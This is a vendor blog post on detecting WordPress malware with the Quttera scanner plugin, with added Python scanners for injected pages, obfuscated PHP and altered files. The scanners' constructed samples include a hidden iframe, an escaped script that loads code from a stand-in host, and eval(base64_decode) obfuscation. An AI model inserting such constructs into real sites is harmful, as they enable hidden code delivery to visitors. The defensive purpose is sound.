18 May, 2020

Using Quttera Web Malware Scanner Plugin to Clear WordPress Malware

The popularity of WordPress also makes it a target for attacks. Here's how you can detect and clear WordPress malware with the Quttera Web Malware Scanner plugin.

WordPress is a solid, secure basis for a website. It's the most popular web CMS in the world. The downside is that it's also the most popular target for malware attacks. Every site uses a theme, and the huge majority use plugins, which can have vulnerabilities of their own. Any vulnerability that turns up will be subject to widespread attacks. You need to make sure your site is well protected and remove WordPress malware quickly.

The Quttera WordPress Malware Scanner will help you to keep your site secure and detect any problems quickly. It guards against malware, backdoors, suspicious JavaScript, viruses, malicious iframes, and much more. Should your site be blacklisted because of an infection, WordPress Malware Scanner will alert you to the situation. Once you install the plugin, it runs regular scans to determine whether your site is clean.

The Two Aspects of WordPress Protection

A WordPress site consists of files in your Web directory and a database. The Web directory contains the WordPress core files as well as files that support plugins. The database contains everything else. This includes content, customization parameters, security-related settings, HTML and URL fragments, CSS, and JavaScript. As a result, there are two kinds of targeting for WordPress attacks.

The first type of attack goes after the core files on the host. Unauthorized modification to these files can add all kinds of malicious behavior, affecting every visitor to the site. The infections don't necessarily cause a change that's visible to the user. The good news is that these infections are relatively easy to catch by comparing the files to a known good state.

The second attack type goes after the database. Database infections are harder to detect, since the content of the tables constantly changes. They can add or alter links, place JavaScript on a page, create unauthorized accounts, change passwords, and redirect pages. If an infection isn't completely cleaned up, a hook may remain that will re-infect the site. Often the best way to recognize a database infection is by changes in the site's behavior.

Quttera's Threefold Approach to WordPress Malware Detection

Full coverage in WordPress malware scanning requires three types of investigation. The Quttera WordPress Malware Scanner approaches scanning in these three ways:

  1. An external malware scanner that views pages the way a browser does.
  2. A server-side scanner that checks the WordPress source files.
  3. A heuristic server-side scanner, looking for patterns in WordPress files that may indicate previously unknown malware.

External Malware Scanner

The external scanner views the site from the user's perspective. It runs on our servers and crawls the pages on your site for the following threat indicators:

  • Cross-Site Scripting (XSS) injection
  • Obfuscated JavaScript injection
  • SPAM
  • Phishing
  • Code injection
  • Malicious iframes
  • Malicious redirects
  • Defacement
  • Drive-by downloads
  • Trojans
  • Backdoors
  • Worms
  • Spyware
  • Viruses

The content of a WordPress page as seen by a client is the product of the content stored in the database, modified by the theme and plugins. Any of these could introduce JavaScript through links to third-party servers. Often this is a legitimate practice, but the added code could be malicious.

Examination of the files alone won't detect all the ways an infection can introduce hostile elements. It requires an external scan to see what is ultimately delivered to the user.
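As an added illustration of what a browser's-eye scan of the delivered page looks for (this is example code written for this page, not the Quttera plugin or its external scanner), the script below parses a page the way a client receives it and reports third-party script hosts, hidden iframes, meta-refresh redirects and inline scripts that rebuild markup from escape sequences. The allowed hosts, the `.example` domains and the sample page are all constructed assumptions; a real check would fetch the live page and use the site's own allowlist.

```python
"""Added example, not code from Quttera's plugin: a minimal "browser's-eye"
check of delivered HTML, flagging the kinds of client-side indicators an
external scan looks for. Host names and the sample page are constructed."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the site at example.com legitimately loads scripts only from
# itself and from its own CDN. Anything else is reported for review.
ALLOWED_SCRIPT_HOSTS = {"example.com", "cdn.example.com"}

# Tokens that commonly appear in injected, obfuscated inline JavaScript.
SUSPICIOUS_JS_TOKENS = ("unescape(", "eval(", "String.fromCharCode", "atob(")


class DeliveredPageScanner(HTMLParser):
    """Collects (kind, detail) findings while parsing the rendered page."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False
        self._script_text = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
            src = a.get("src")
            if src:
                host = urlparse(src).hostname
                if host and host not in ALLOWED_SCRIPT_HOSTS:
                    self.findings.append(("third-party-script", src))
        elif tag == "iframe":
            # Zero-sized or invisible frames are a classic injection pattern.
            style = (a.get("style") or "").replace(" ", "").lower()
            hidden = (a.get("width") == "0" or a.get("height") == "0"
                      or "display:none" in style or "visibility:hidden" in style)
            if hidden:
                self.findings.append(("hidden-iframe", a.get("src", "")))
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            self.findings.append(("meta-redirect", a.get("content", "")))

    def handle_data(self, data):
        if self._in_script:
            self._script_text.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
            body = "".join(self._script_text).strip()
            self._script_text = []
            for token in SUSPICIOUS_JS_TOKENS:
                if token in body:
                    self.findings.append(("obfuscated-inline-script", token))
                    break


def scan_html(html):
    """Return the list of (kind, detail) findings for one delivered page."""
    scanner = DeliveredPageScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample page: one allowed script, one third-party script, a
# hidden iframe, a meta refresh and an inline script that rebuilds a tag
# from URL-escaped text.
SAMPLE_PAGE = """<html><head>
<meta http-equiv="refresh" content="0;url=http://redirect-target.example/">
<script src="https://cdn.example.com/app.js"></script>
<script src="http://stats.third-party.example/t.js"></script>
</head><body>
<h1>Welcome</h1>
<iframe src="http://frame-host.example/f" width="0" height="0"></iframe>
<script>document.write(unescape('%3Cscript src=%22http://frame-host.example/x.js%22%3E%3C/script%3E'));</script>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_PAGE):
        print(f"{kind:26} {detail}")
```

Run against the sample page it reports four findings, in document order: the meta redirect, the script from the non-allowlisted host, the zero-sized iframe and the `unescape(` inline script. A page that only loads scripts from allowed hosts produces no findings, which is the point of comparing the delivered page against what the site is expected to serve.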

To run the external scan on your site, go to
WordPress Admin Panel -> Dashboard
Click on "Quttera" in the left panel and select "External scanner." You should see the name of your website. Click on the "Scan Now" button.
Wait for the scan to finish, then click on "Full investigation report." Review the report for any threats indicated.

Internal Malware Scan

In addition to the external scan, the Quttera malware scanner provides the ability to fully investigate WordPress source files, including PHP and JavaScript files. The issues detected include:

  • Code injection
  • Obfuscated JavaScript injection
  • Obfuscated PHP injection
  • Drive-by downloads
  • Trojans
  • Backdoors
  • Worms
  • Spyware
  • Viruses

To run the internal scan, go to
WordPress Admin Panel -> Dashboard
Click on "Quttera" in the left panel and select "Internal scanner." Click the "Scan Now" button to start the scan. The internal scanner will subscribe to the WordPress cron job service. A scan will run every time WordPress calls the plugin handler.

The scan runs at low speed so that it doesn't take too much CPU time away from your site. It may take a while to scan all your files. When the scan is done, you can click the "Download Report" button and view the full investigation report.

Heuristic Internal Malware Scan

The perpetrators of WordPress malware try to conceal what they're doing. They use code obfuscation techniques to disguise and bury executable PHP code in data. Older versions of PHP are especially vulnerable; they provide many ways to execute data, some of which have been eliminated in PHP 7. It isn't generally possible to match these attacks to known signatures.

To overcome the limitations of conventional malware scanning, we have developed a highly sensitive heuristic scanner to detect possibly infected files. This scan may produce false positives, so use its results carefully. Legitimate software may use obfuscated code for intellectual property protection.
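The indicator-scoring idea behind a heuristic scan, as an added example written for this page (it is not Quttera's scanner, and the weights, threshold and regular expressions are illustrative assumptions): each PHP source file is searched for constructs that obfuscated code tends to rely on, such as `eval` fed by `base64_decode`, decompression helpers, the old `preg_replace` `/e` modifier that PHP 7 removed, and very long base64 literals, and the weighted hits are summed. The samples are constructed; the "payload" is just the base64 of a harmless `echo`. The data-URI sample shows why such a scanner must be read with care: a legitimate file can trip one indicator without being malicious.

```python
"""Added example, not Quttera's scanner: a small indicator-based heuristic
for PHP source, in the spirit of the heuristic scan described above.
Weights and threshold are illustrative; the sample files are constructed."""
import base64
import re

# Each indicator: (name, compiled regex, weight).
INDICATORS = [
    ("eval", re.compile(r"\beval\s*\("), 3),
    ("base64_decode", re.compile(r"\bbase64_decode\s*\("), 2),
    ("decompress_or_rot", re.compile(r"\b(?:gzinflate|gzuncompress|str_rot13)\s*\("), 2),
    # preg_replace with the /e modifier evaluated the replacement as PHP code;
    # it was removed in PHP 7, so its presence in live code is a red flag.
    # (Only the common '/' pattern delimiter is recognised here.)
    ("preg_replace_e", re.compile(r"\bpreg_replace\s*\(\s*['\"]/[^'\"]*/[a-zA-Z]*e[a-zA-Z]*['\"]"), 3),
    # Calling a function whose name lives in a variable, with a variable argument.
    ("variable_function", re.compile(r"\$\w+\s*\(\s*\$\w+"), 2),
    # Strings assembled from chr() calls to hide keywords from plain grep.
    ("chr_concat", re.compile(r"\bchr\s*\(\s*\d+\s*\)\s*\.\s*chr\s*\("), 2),
    # A long base64 literal: common in droppers, but also in embedded images.
    ("long_base64_literal", re.compile(r"['\"][A-Za-z0-9+/=]{200,}['\"]"), 2),
]
THRESHOLD = 4  # score at or above this is reported for manual review


def scan_php(source):
    """Return the indicators found in one PHP source string and a verdict."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(source)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return {"score": score, "indicators": hits, "suspicious": score >= THRESHOLD}


# Constructed samples (not real malware). The payload decodes to echo "hi";
_PAYLOAD = base64.b64encode(b'echo "hi";').decode()
SUSPECT_EVAL = "<?php $p = '%s'; eval(base64_decode($p)); ?>" % _PAYLOAD
SUSPECT_PREG = "<?php preg_replace('/.*/e', '$f($m)', $input); ?>"

# A legitimate-looking file with an embedded image: one indicator fires, but
# the score stays under the threshold. Raise the weight and it becomes a
# false positive, which is why the text says to use the results carefully.
_ICON = base64.b64encode(bytes(range(256))).decode()  # 344 base64 characters
LEGIT_DATA_URI = "<?php $icon = '%s'; echo '<img src=\"data:image/png;base64,' . $icon . '\">'; ?>" % _ICON

if __name__ == "__main__":
    for label, src in [("suspect-eval", SUSPECT_EVAL), ("suspect-preg", SUSPECT_PREG),
                       ("legit-data-uri", LEGIT_DATA_URI)]:
        print(label, scan_php(src))
```

In practice the report entry would carry the file path, the matched indicators and the offending line so a reviewer can decide whether the obfuscation is an infection or, as the text notes, a vendor's deliberate code protection.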

Each entry in the investigation report includes details of the suspected infection. Here is an example:
You can fix such problems by editing the indicated file with the text editor of your choice. Be careful when doing this; any typing error could break your site. Back the site up before making any changes.

The internal scan report lists any alien files detected in your WordPress directories. All such files are likely to be part of an infection or malware attack. Investigate any such files carefully; they could contain a malware payload, and running them as PHP could activate it. Again, back up everything first, in case a file which you delete turns out to be legitimate and necessary.
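The two file-side checks described on this page, comparing core files to a known good state and listing alien files that have appeared in the WordPress directories, can both be done from one hashed manifest. The script below is an added example written for this page, not the plugin's code: it snapshots a directory tree into a SHA-256 manifest, then reports files that were modified, removed or added since the snapshot, and singles out added PHP files under `wp-content/uploads/`, a directory that on a typical site should hold only media (that rule and the tiny fake WordPress tree in `demo()` are constructed assumptions).

```python
"""Added example, not Quttera's code: comparing a WordPress directory to a
known-good manifest to find modified, missing and alien files."""
import hashlib
import os
import shutil
import tempfile


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Map each file path (relative to root, '/'-separated) to its SHA-256."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = sha256_of(full)
    return manifest


# Assumption: directories where executable PHP has no business being on a
# site that only serves media from uploads.
NO_PHP_DIRS = ("wp-content/uploads/",)


def compare(manifest, root):
    """Diff the current tree against a manifest taken while the site was clean."""
    current = build_manifest(root)
    modified = sorted(p for p in manifest if p in current and current[p] != manifest[p])
    missing = sorted(p for p in manifest if p not in current)
    added = sorted(p for p in current if p not in manifest)
    alien_php = sorted(p for p in added if p.endswith(".php") and p.startswith(NO_PHP_DIRS))
    return {"modified": modified, "missing": missing, "added": added, "alien_php": alien_php}


def _write(root, rel, text):
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w") as f:
        f.write(text)


def demo():
    """Constructed scenario: a tiny fake WordPress tree, snapshot, then changes."""
    root = tempfile.mkdtemp()
    try:
        _write(root, "wp-config.php", "<?php define('DB_NAME', 'wp'); ?>")
        _write(root, "wp-includes/functions.php", "<?php function f() {} ?>")
        _write(root, "wp-content/uploads/2020/05/logo.png", "png-bytes")
        baseline = build_manifest(root)  # taken while the site is known clean
        # Simulated changes: a core file altered, one file removed, and a PHP
        # file (harmless placeholder content) dropped into the uploads tree.
        _write(root, "wp-includes/functions.php", "<?php function f() {} /* changed */ ?>")
        os.remove(os.path.join(root, "wp-config.php"))
        _write(root, "wp-content/uploads/2020/05/x.php", "<?php /* alien file */ ?>")
        return compare(baseline, root)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind:10} {paths}")
```

The manifest only has value if it was taken from a state you trust (a fresh install or a verified backup), and it should be stored outside the web root so an intruder cannot update it alongside the files. Anything it reports as modified or alien is a candidate for the same careful review the text asks for, with a backup taken first.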

We're ready to help

You can download the plugin here.

We have posted a series of three articles to help you with the malware and hacking remediation process.
  1. Preparation
  2. Cleanup process
  3. Hardening

If you detect an infection and run into problems cleaning it up, please feel free to contact our support team. We offer full website monitoring and protection with the ThreatSign service. It will scan your site, report malware and blacklisting, run analytics, remove malware, and get you quick removal from blacklists. When you sign up for ThreatSign, you get ongoing, comprehensive protection of your website.